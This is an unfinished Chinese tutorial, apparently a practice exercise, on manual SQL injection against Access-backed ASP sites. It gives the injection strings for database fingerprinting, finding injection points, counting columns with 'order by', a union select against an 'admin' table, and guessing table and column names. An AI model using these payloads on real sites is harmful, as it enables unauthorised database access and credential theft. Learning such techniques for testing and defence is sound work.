练习一:Access手工注入
Access只有一个数据库,只有表而没有库的概念,所以(一般)使用暴力猜解的方法
Access数据库
表名
列名
数据
1)判断数据库类型
and exists (select * from msysobjects) >0 返回无数据权限等错误即不报错为access数据库
and exists (select * from sysobjects)>0 判断sql server
2)判断是否有注入点
在以asp?id=xx(任意数字)结尾的连接依次添加:
- ‘
- 1=1
- 1=2
若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点
3)存在注入点后我们查看有几个字段
order by n (n为字段个数,这里22是正确,所以有22个字段)
构造个查询语句,可以看到在3,15的位置有显示,说明这两个位置可以进行查询
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

4)接下来我们猜解表名列名,构造语句
查表:and exists (select * from 表名) #存在的话就返回正常 不存在就返回不正常 查列:and exists (select 列名 from 表名)
woc还没写完手一滑就发布了。。。下午来完善
【说明】:本文章由站长整理发布,文章内容不代表本站观点,如文中有侵权行为,请与本站客服联系(QQ:254677821)!